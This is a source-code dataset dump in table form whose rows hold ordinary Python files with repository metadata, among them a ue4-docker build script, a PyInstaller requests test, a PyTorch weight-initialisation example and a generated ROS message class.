hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a1f3a1a459e4429145178dc359b6f5b22d51211 | 22,844 | py | Python | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | [
"MIT"
] | 579 | 2018-05-05T04:39:46.000Z | 2022-03-29T10:22:21.000Z | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | [
"MIT"
] | 221 | 2018-07-01T20:30:18.000Z | 2022-03-28T14:56:52.000Z | ue4docker/build.py | jonghyunho/ue4-docker | 9e18e139c17ae09475df64f59f8ad5fbb3d32626 | [
"MIT"
] | 132 | 2018-05-06T16:28:31.000Z | 2022-03-16T12:44:19.000Z | import argparse, getpass, humanfriendly, json, os, shutil, sys, tempfile, time
from .infrastructure import *
from .version import __version__
from os.path import join
def _getCredential(args, name, envVar, promptFunc):
# Check if the credential was specified via the command-line
if getattr(args, name, None) is not None:
print("Using {} specified via `-{}` command-line argument.".format(name, name))
return getattr(args, name)
# Check if the credential was specified via an environment variable
if envVar in os.environ:
print("Using {} specified via {} environment variable.".format(name, envVar))
return os.environ[envVar]
# Fall back to prompting the user for the value
return promptFunc()
def _getUsername(args):
return _getCredential(
args, "username", "UE4DOCKER_USERNAME", lambda: input("Username: ")
)
def _getPassword(args):
return _getCredential(
args, "password", "UE4DOCKER_PASSWORD", lambda: getpass.getpass("Password: ")
)
def build():
# Create our logger to generate coloured output on stderr
logger = Logger(prefix="[{} build] ".format(sys.argv[0]))
# Register our supported command-line arguments
parser = argparse.ArgumentParser(prog="{} build".format(sys.argv[0]))
BuildConfiguration.addArguments(parser)
# If no command-line arguments were supplied, display the help message and exit
if len(sys.argv) < 2:
parser.print_help()
sys.exit(0)
# Parse the supplied command-line arguments
try:
config = BuildConfiguration(parser, sys.argv[1:])
except RuntimeError as e:
logger.error("Error: {}".format(e))
sys.exit(1)
# Verify that Docker is installed
if DockerUtils.installed() == False:
logger.error(
"Error: could not detect Docker version. Please ensure Docker is installed."
)
sys.exit(1)
# Verify that we aren't trying to build Windows containers under Windows 10 when in Linux container mode (or vice versa)
# (Note that we don't bother performing this check when we're just copying Dockerfiles to an output directory)
if config.layoutDir is None:
dockerPlatform = DockerUtils.info()["OSType"].lower()
if config.containerPlatform == "windows" and dockerPlatform == "linux":
logger.error(
"Error: cannot build Windows containers when Docker Desktop is in Linux container",
False,
)
logger.error(
"mode. Use the --linux flag if you want to build Linux containers instead.",
False,
)
sys.exit(1)
elif config.containerPlatform == "linux" and dockerPlatform == "windows":
logger.error(
"Error: cannot build Linux containers when Docker Desktop is in Windows container",
False,
)
logger.error(
"mode. Remove the --linux flag if you want to build Windows containers instead.",
False,
)
sys.exit(1)
# Create an auto-deleting temporary directory to hold our build context
with tempfile.TemporaryDirectory() as tempDir:
# Copy our Dockerfiles to the temporary directory
contextOrig = join(os.path.dirname(os.path.abspath(__file__)), "dockerfiles")
contextRoot = join(tempDir, "dockerfiles")
shutil.copytree(contextOrig, contextRoot)
# Create the builder instance to build the Docker images
builder = ImageBuilder(
contextRoot,
config.containerPlatform,
logger,
config.rebuild,
config.dryRun,
config.layoutDir,
config.opts,
config.combine,
)
# Resolve our main set of tags for the generated images
mainTags = [
"{}{}-{}".format(config.release, config.suffix, config.prereqsTag),
config.release + config.suffix,
]
# Print the command-line invocation that triggered this build, masking any supplied passwords
args = [
"*******"
if config.args.password is not None and arg == config.args.password
else arg
for arg in sys.argv
]
logger.info("COMMAND-LINE INVOCATION:", False)
logger.info(str(args), False)
# Print the details of the Unreal Engine version being built
logger.info("UNREAL ENGINE VERSION SETTINGS:")
logger.info(
"Custom build: {}".format("Yes" if config.custom == True else "No"), False
)
if config.custom == True:
logger.info("Custom name: " + config.release, False)
else:
logger.info("Release: " + config.release, False)
logger.info("Repository: " + config.repository, False)
logger.info("Branch/tag: " + config.branch + "\n", False)
# Determine if we are using a custom version for ue4cli or conan-ue4cli
if config.ue4cliVersion is not None or config.conanUe4cliVersion is not None:
logger.info("CUSTOM PACKAGE VERSIONS:", False)
logger.info(
"ue4cli: {}".format(
config.ue4cliVersion
if config.ue4cliVersion is not None
else "default"
),
False,
)
logger.info(
"conan-ue4cli: {}\n".format(
config.conanUe4cliVersion
if config.conanUe4cliVersion is not None
else "default"
),
False,
)
# Report any advanced configuration options that were specified
if len(config.opts) > 0:
logger.info("ADVANCED CONFIGURATION OPTIONS:", False)
for key, value in sorted(config.opts.items()):
logger.info("{}: {}".format(key, json.dumps(value)), False)
print("", file=sys.stderr, flush=True)
# Determine if we are building Windows or Linux containers
if config.containerPlatform == "windows":
# Provide the user with feedback so they are aware of the Windows-specific values being used
logger.info("WINDOWS CONTAINER SETTINGS", False)
logger.info(
"Isolation mode: {}".format(config.isolation), False
)
logger.info(
"Base OS image: {}".format(config.baseImage), False
)
logger.info(
"Dll source image: {}".format(config.dllSrcImage), False
)
logger.info(
"Host OS: {}".format(WindowsUtils.systemString()),
False,
)
logger.info(
"Memory limit: {}".format(
"No limit"
if config.memLimit is None
else "{:.2f}GB".format(config.memLimit)
),
False,
)
logger.info(
"Detected max image size: {:.0f}GB".format(DockerUtils.maxsize()),
False,
)
logger.info(
"Visual Studio: {}".format(config.visualStudio), False
)
# Verify that the host OS is not a release that is blacklisted due to critical bugs
if (
config.ignoreBlacklist == False
and WindowsUtils.isBlacklistedWindowsHost() == True
):
logger.error(
"Error: detected blacklisted host OS version: {}".format(
WindowsUtils.systemString()
),
False,
)
logger.error("", False)
logger.error(
"This version of Windows contains one or more critical bugs that",
False,
)
logger.error(
"render it incapable of successfully building UE4 container images.",
False,
)
logger.error(
"You will need to use an older or newer version of Windows.", False
)
logger.error("", False)
logger.error("For more information, see:", False)
logger.error(
"https://unrealcontainers.com/docs/concepts/windows-containers",
False,
)
sys.exit(1)
# Verify that the user is not attempting to build images with a newer kernel version than the host OS
newer_check = WindowsUtils.isNewerBaseTag(
config.hostBasetag, config.basetag
)
if newer_check:
logger.error(
"Error: cannot build container images with a newer kernel version than that of the host OS!"
)
sys.exit(1)
elif newer_check is None:
logger.info(
"Warning: unable to determine whether host system is new enough to use specified base tag"
)
# Ensure the Docker daemon is configured correctly
requiredLimit = WindowsUtils.requiredSizeLimit()
if DockerUtils.maxsize() < requiredLimit:
logger.error("SETUP REQUIRED:")
logger.error(
"The max image size for Windows containers must be set to at least {}GB.".format(
requiredLimit
)
)
logger.error(
"See the Microsoft documentation for configuration instructions:"
)
logger.error(
"https://docs.microsoft.com/en-us/virtualization/windowscontainers/manage-containers/container-storage#storage-limits"
)
logger.error(
"Under Windows Server, the command `{} setup` can be used to automatically configure the system.".format(
sys.argv[0]
)
)
sys.exit(1)
elif config.containerPlatform == "linux":
# Determine if we are building CUDA-enabled container images
capabilities = (
"CUDA {} + OpenGL".format(config.cuda)
if config.cuda is not None
else "OpenGL"
)
logger.info("LINUX CONTAINER SETTINGS", False)
logger.info(
"Building GPU-enabled images compatible with NVIDIA Docker ({} support).\n".format(
capabilities
),
False,
)
# Report which Engine components are being excluded (if any)
logger.info("GENERAL SETTINGS", False)
logger.info(
"Changelist override: {}".format(
config.changelist
if config.changelist is not None
else "(None specified)"
),
False,
)
if len(config.excludedComponents) > 0:
logger.info("Excluding the following Engine components:", False)
for component in config.describeExcludedComponents():
logger.info("- {}".format(component), False)
else:
logger.info("Not excluding any Engine components.", False)
# Determine if we need to prompt for credentials
if config.dryRun == True:
# Don't bother prompting the user for any credentials during a dry run
logger.info(
"Performing a dry run, `docker build` commands will be printed and not executed.",
False,
)
username = ""
password = ""
elif config.layoutDir is not None:
# Don't bother prompting the user for any credentials when we're just copying the Dockerfiles to a directory
logger.info(
"Copying generated Dockerfiles to: {}".format(config.layoutDir), False
)
username = ""
password = ""
elif builder.willBuild("ue4-source", mainTags) == False:
# Don't bother prompting the user for any credentials if we're not building the ue4-source image
logger.info(
"Not building the ue4-source image, no Git credentials required.", False
)
username = ""
password = ""
else:
# Retrieve the Git username and password from the user when building the ue4-source image
print(
"\nRetrieving the Git credentials that will be used to clone the UE4 repo"
)
username = _getUsername(config.args)
password = _getPassword(config.args)
print()
# If resource monitoring has been enabled, start the resource monitoring background thread
resourceMonitor = ResourceMonitor(logger, config.args.interval)
if config.args.monitor == True:
resourceMonitor.start()
# Start the HTTP credential endpoint as a child process and wait for it to start
endpoint = None
if config.opts.get("credential_mode", "endpoint") == "endpoint":
endpoint = CredentialEndpoint(username, password)
endpoint.start()
try:
# Keep track of our starting time
startTime = time.time()
# If we're copying Dockerfiles to an output directory then make sure it exists and is empty
if config.layoutDir is not None:
if os.path.exists(config.layoutDir):
shutil.rmtree(config.layoutDir)
os.makedirs(config.layoutDir)
# Keep track of the images we've built
builtImages = []
commonArgs = [
"--build-arg",
"NAMESPACE={}".format(GlobalConfiguration.getTagNamespace()),
]
# Compute the build options for the UE4 build prerequisites image
# (This is the only image that does not use any user-supplied tag suffix, since the tag always reflects any customisations)
prereqsArgs = ["--build-arg", "BASEIMAGE=" + config.baseImage]
if config.containerPlatform == "windows":
prereqsArgs = prereqsArgs + [
"--build-arg",
"DLLSRCIMAGE=" + config.dllSrcImage,
"--build-arg",
"VISUAL_STUDIO_BUILD_NUMBER=" + config.visualStudioBuildNumber,
]
# Build the UE4 build prerequisites image
builder.build(
"ue4-build-prerequisites",
[config.prereqsTag],
commonArgs + config.platformArgs + prereqsArgs,
)
builtImages.append("ue4-build-prerequisites")
# If we're using build secrets then pass the Git username and password to the UE4 source image as secrets
secrets = {}
if config.opts.get("credential_mode", "endpoint") == "secrets":
secrets = {"username": username, "password": password}
# Build the UE4 source image
prereqConsumerArgs = [
"--build-arg",
"PREREQS_TAG={}".format(config.prereqsTag),
]
credentialArgs = [] if len(secrets) > 0 else endpoint.args()
ue4SourceArgs = prereqConsumerArgs + [
"--build-arg",
"GIT_REPO={}".format(config.repository),
"--build-arg",
"GIT_BRANCH={}".format(config.branch),
"--build-arg",
"VERBOSE_OUTPUT={}".format("1" if config.verbose == True else "0"),
]
builder.build(
"ue4-source",
mainTags,
commonArgs + config.platformArgs + ue4SourceArgs + credentialArgs,
secrets,
)
builtImages.append("ue4-source")
# Build the UE4 Engine source build image, unless requested otherwise by the user
ue4BuildArgs = prereqConsumerArgs + [
"--build-arg",
"TAG={}".format(mainTags[1]),
]
if config.noEngine == False:
builder.build(
"ue4-engine",
mainTags,
commonArgs + config.platformArgs + ue4BuildArgs,
)
builtImages.append("ue4-engine")
else:
logger.info(
"User specified `--no-engine`, skipping ue4-engine image build."
)
# Build the minimal UE4 CI image, unless requested otherwise by the user
minimalArgs = (
["--build-arg", "CHANGELIST={}".format(config.changelist)]
if config.changelist is not None
else []
)
buildUe4Minimal = config.noMinimal == False
if buildUe4Minimal == True:
builder.build(
"ue4-minimal",
mainTags,
commonArgs + config.platformArgs + ue4BuildArgs + minimalArgs,
)
builtImages.append("ue4-minimal")
else:
logger.info(
"User specified `--no-minimal`, skipping ue4-minimal image build."
)
# Build the full UE4 CI image, unless requested otherwise by the user
buildUe4Full = buildUe4Minimal == True and config.noFull == False
if buildUe4Full == True:
# If custom version strings were specified for ue4cli and/or conan-ue4cli, use them
infrastructureFlags = []
if config.ue4cliVersion is not None:
infrastructureFlags.extend(
[
"--build-arg",
"UE4CLI_VERSION={}".format(config.ue4cliVersion),
]
)
if config.conanUe4cliVersion is not None:
infrastructureFlags.extend(
[
"--build-arg",
"CONAN_UE4CLI_VERSION={}".format(config.conanUe4cliVersion),
]
)
# Build the image
builder.build(
"ue4-full",
mainTags,
commonArgs
+ config.platformArgs
+ ue4BuildArgs
+ infrastructureFlags,
)
builtImages.append("ue4-full")
else:
logger.info(
"Not building ue4-minimal or user specified `--no-full`, skipping ue4-full image build."
)
# If we are generating Dockerfiles then include information about the options used to generate them
if config.layoutDir is not None:
# Determine whether we generated a single combined Dockerfile or a set of Dockerfiles
if config.combine == True:
# Generate a comment to place at the top of the single combined Dockerfile
lines = [
"This file was generated by ue4-docker version {} with the following options:".format(
__version__
),
"",
]
lines.extend(
[
"- {}: {}".format(key, json.dumps(value))
for key, value in sorted(config.opts.items())
]
)
lines.extend(
[
"",
"This Dockerfile combines the steps for the following images:",
"",
]
)
lines.extend(["- {}".format(image) for image in builtImages])
comment = "\n".join(["# {}".format(line) for line in lines])
# Inject the comment at the top of the Dockerfile, being sure to place it after any `escape` parser directive
dockerfile = join(config.layoutDir, "combined", "Dockerfile")
dockerfileContents = FilesystemUtils.readFile(dockerfile)
if dockerfileContents.startswith("# escape"):
newline = dockerfileContents.index("\n")
dockerfileContents = (
dockerfileContents[0 : newline + 1]
+ "\n"
+ comment
+ "\n\n"
+ dockerfileContents[newline + 1 :]
)
else:
dockerfileContents = comment + "\n\n" + dockerfileContents
FilesystemUtils.writeFile(dockerfile, dockerfileContents)
else:
# Create a JSON file to accompany the set of generated Dockerfiles
FilesystemUtils.writeFile(
join(config.layoutDir, "generated.json"),
json.dumps(
{
"version": __version__,
"images": builtImages,
"opts": config.opts,
},
indent=4,
sort_keys=True,
),
)
# Report the total execution time
endTime = time.time()
logger.action(
"Total execution time: {}".format(
humanfriendly.format_timespan(endTime - startTime)
)
)
# Stop the resource monitoring background thread if it is running
resourceMonitor.stop()
# Stop the HTTP server
if endpoint is not None:
endpoint.stop()
except (Exception, KeyboardInterrupt) as e:
# One of the images failed to build
logger.error("Error: {}".format(e))
resourceMonitor.stop()
if endpoint is not None:
endpoint.stop()
sys.exit(1)
| 40.21831 | 138 | 0.516065 |
4a1f3a62bafc3b97a993a12a5bfe0fb8109ec257 | 2,840 | py | Python | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | [
"Apache-2.0"
] | 9,267 | 2015-01-01T04:08:45.000Z | 2022-03-31T11:42:38.000Z | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | [
"Apache-2.0"
] | 5,150 | 2015-01-01T12:09:56.000Z | 2022-03-31T18:06:12.000Z | tests/functional/scripts/pyi_lib_requests.py | hawkhai/pyinstaller | 016a24479b34de161792c72dde455a81ad4c78ae | [
"Apache-2.0"
] | 2,101 | 2015-01-03T10:25:27.000Z | 2022-03-30T11:04:42.000Z | # -----------------------------------------------------------------------------
# Copyright (c) 2014-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
# -----------------------------------------------------------------------------
import socket
try:
import BaseHTTPServer
import SimpleHTTPServer
except ImportError:
import http.server as BaseHTTPServer
import http.server as SimpleHTTPServer
import os
import ssl
import sys
import threading
import time
import requests
"""
Note: to re-create the server.pem file use the following commands:
cd /path/to/pyinstaller.git/tests/functional
openssl req -new -x509 -keyout data/requests/server.pem \
-text -out data/requests/server.pem -days 36500 \
-nodes -config data/requests/openssl.conf
"""
if getattr(sys, 'frozen', False):
# We are running in a |PyInstaller| bundle.
basedir = sys._MEIPASS
else:
# We are running in a normal Python environment.
basedir = os.path.dirname(__file__)
SERVER_CERT = os.path.join(basedir, "server.pem")
if not os.path.exists(SERVER_CERT):
raise SystemExit('Certificate-File %s is missing' % SERVER_CERT)
def main():
SERVER_PORT = 8443
httpd = None
# Since unit tests run in parallel, the port may be in use, so retry creating the server while incrementing
# the port number.
while SERVER_PORT < 8493: # Max 50 retries
try:
# SSL server copied from here: http://www.piware.de/2011/01/creating-an-https-server-in-python/
httpd = BaseHTTPServer.HTTPServer(('localhost', SERVER_PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
except socket.error as e:
if e.errno == 98: # Address in use
SERVER_PORT += 1
continue
else:
# Some other socket.error
raise
else:
# Success
break
else:
# Did not break from loop, so we ran out of retries
assert False, "Could not bind server port: all ports in use."
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=SERVER_CERT, server_side=True)
def ssl_server():
httpd.serve_forever()
# Start the SSL server
thread = threading.Thread(target=ssl_server)
thread.daemon = True
thread.start()
# Wait a bit for the server to start
time.sleep(1)
# Use requests to get a page from the server
requests.get("https://localhost:{}".format(SERVER_PORT), verify=SERVER_CERT)
# requests.get("https://github.com")
if __name__ == '__main__':
main()
| 30.212766 | 116 | 0.640493 |
4a1f3a7b7afdf23c5694093baa462cd077e281f9 | 2,000 | py | Python | ML/Pytorch/Basics/pytorch_init_weights.py | xuyannus/Machine-Learning-Collection | 6d5dcd18d4e40f90e77355d56a2902e4c617ecbe | [
"MIT"
] | 3,094 | 2020-09-20T04:34:31.000Z | 2022-03-31T23:59:46.000Z | ML/Pytorch/Basics/pytorch_init_weights.py | xkhainguyen/Machine-Learning-Collection | 425d196e9477dbdbbd7cc0d19d29297571746ab5 | [
"MIT"
] | 79 | 2020-09-24T08:54:17.000Z | 2022-03-30T14:45:08.000Z | ML/Pytorch/Basics/pytorch_init_weights.py | xkhainguyen/Machine-Learning-Collection | 425d196e9477dbdbbd7cc0d19d29297571746ab5 | [
"MIT"
] | 1,529 | 2020-09-20T16:21:21.000Z | 2022-03-31T21:16:25.000Z | """
Example code of how to initialize weights for a simple CNN network.
Video explanation: https://youtu.be/xWQ-p_o0Uik
Got any questions leave a comment on youtube :)
Programmed by Aladdin Persson <aladdin.persson at hotmail dot com>
* 2020-04-10 Initial coding
"""
# Imports
import torch.nn as nn # All neural network modules, nn.Linear, nn.Conv2d, BatchNorm, Loss functions
import torch.nn.functional as F # All functions that don't have any parameters
class CNN(nn.Module):
def __init__(self, in_channels, num_classes):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(
in_channels=in_channels,
out_channels=6,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
)
self.pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.conv2 = nn.Conv2d(
in_channels=6,
out_channels=16,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
)
self.fc1 = nn.Linear(16 * 7 * 7, num_classes)
self.initialize_weights()
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = F.relu(self.conv2(x))
x = self.pool(x)
x = x.reshape(x.shape[0], -1)
x = self.fc1(x)
return x
def initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_uniform_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.kaiming_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
if __name__ == "__main__":
model = CNN(in_channels=3, num_classes=10)
for param in model.parameters():
print(param)
| 28.571429 | 100 | 0.567 |
4a1f3b29d83ab19c1f0f1f31419de477df76699e | 79 | py | Python | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | null | null | null | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | null | null | null | keeper.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | null | null | null | from keepercommander.__main__ import main
if __name__ == '__main__':
main() | 26.333333 | 41 | 0.746835 |
4a1f3bd92de07f93d8534c62db3c2d95012b23ad | 57 | py | Python | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | acmicpc/10699/10699.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z | import datetime
print(str(datetime.datetime.now())[:10])
| 19 | 40 | 0.754386 |
4a1f3bf34f9aba2cd44144acea1bcb7bd1e22ecc | 553 | py | Python | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | [
"MIT"
] | null | null | null | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | [
"MIT"
] | null | null | null | etl/load_parties_from_csv.py | The-Animals/data-pipeline | 57c46dfe42807743d07d9f33bb29a2247afe8aff | [
"MIT"
] | null | null | null | from pkgutil import get_data
from pandas import read_csv
from io import StringIO
from storage_clients import MySqlClient, DbSchema
"""
load MLA data from data/parties.csv
"""
def load_parties():
table = DbSchema.parties
print('reading party data from csv')
data = StringIO(str(get_data('data', 'parties.csv').decode('utf-8')))
df = read_csv(data)
with MySqlClient() as mysql_client:
print('writing party data to database')
mysql_client.overwrite_table(table, df)
if __name__ == '__main__':
load_parties()
| 21.269231 | 73 | 0.705244 |
4a1f3c73eb2d0088f4261e1c181d6ad917a4006a | 776 | py | Python | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/qualys_ssl/komand_qualys_ssl/actions/status/schema.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z | # GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Retrieve status codes"
class Input:
pass
class Output:
STATUSDETAILS = "statusDetails"
class StatusInput(komand.Input):
schema = json.loads("""
{}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class StatusOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"statusDetails": {
"type": "object",
"title": "Status Codes",
"description": "Status Codes",
"order": 1
}
},
"required": [
"statusDetails"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 16.510638 | 57 | 0.597938 |
4a1f3d59a36d2f37a96d2c9f3c056a99eaf2aa4d | 13,984 | py | Python | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | [
"MIT"
] | null | null | null | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | [
"MIT"
] | null | null | null | devel/lib/python2.7/dist-packages/yolov3_pytorch_ros/msg/_BoundingBoxes.py | elmexx/eWolf-Jetson | 34242b1cea360c1e81d0e26a9e8cb70cf9ca354e | [
"MIT"
] | null | null | null | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from yolov3_pytorch_ros/BoundingBoxes.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
import yolov3_pytorch_ros.msg
class BoundingBoxes(genpy.Message):
_md5sum = "c03e7499c2e5b938e301fea76459b092"
_type = "yolov3_pytorch_ros/BoundingBoxes"
_has_header = True # flag to mark the presence of a Header object
_full_text = """# Copyright (c) 2017, Marko Bjelonic, Robotic Systems Lab, ETH Zurich
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Header header
Header image_header
BoundingBox[] bounding_boxes
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: yolov3_pytorch_ros/BoundingBox
# Copyright (c) 2017, Marko Bjelonic, Robotic Systems Lab, ETH Zurich
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
string Class
float64 probability
int64 xmin
int64 ymin
int64 xmax
int64 ymax
"""
__slots__ = ['header','image_header','bounding_boxes']
_slot_types = ['std_msgs/Header','std_msgs/Header','yolov3_pytorch_ros/BoundingBox[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,image_header,bounding_boxes
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(BoundingBoxes, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = []
else:
self.header = std_msgs.msg.Header()
self.image_header = std_msgs.msg.Header()
